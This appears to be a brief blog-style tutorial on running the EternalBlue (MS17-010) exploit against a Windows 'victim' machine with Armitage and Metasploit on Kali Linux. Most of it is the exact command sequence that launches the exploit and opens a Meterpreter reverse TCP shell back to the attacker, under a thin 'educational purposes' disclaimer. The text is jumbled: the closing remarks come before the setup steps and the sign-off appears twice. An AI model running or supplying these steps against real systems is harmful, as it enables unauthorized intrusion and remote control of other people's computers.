Note : This article is for educational purposes. I will not be responsible for any kind of illegal activity.
And in meterpreter tab you can execute any command and chage settings of your victim machine.
Thanks for reading !!!!
Let's get started by firing up your kali linux machine.
- So enter the commands as follows to start armitage.
- #service postgresql start
- #armitage & ===> and click connect (to connect to database on localhost).
- Click yes on next dialog box (asking to start metasploit daemon).
- So above screen shows my server machine IP which is running as a virtual machine.
- If asked like :-
- Enter the IP of your machine for the network interface which is in same network with your victim machine.
- Now in menu go to HOSTS => (ADD HOST)
- Enter the IP of victim machine.
- Now machine will be added . Right click on machine and click scan .
- Wait for the scan to complete and if available it will tell you the Victim's machine OS full info.
- Now in console tab as shown in figure enter the following command.
- msf> use exploit/windows/smb/ms17_010_eternalblue
- msf> set payload windows/x64/meterpreter/reverse_tcp
- msf> set LPORT 500
- msf> set LHOST (your ip).
- msf> set RHOST (victime ip)
- msf> exploit -j
- Wait for the exploit to complete if executed properly then you will design like following on the machine
- Now right click on machine go to meterpreter1 => interact => cmd\meterpreter.
- And you will get the following console.
Thanks for reading !!!!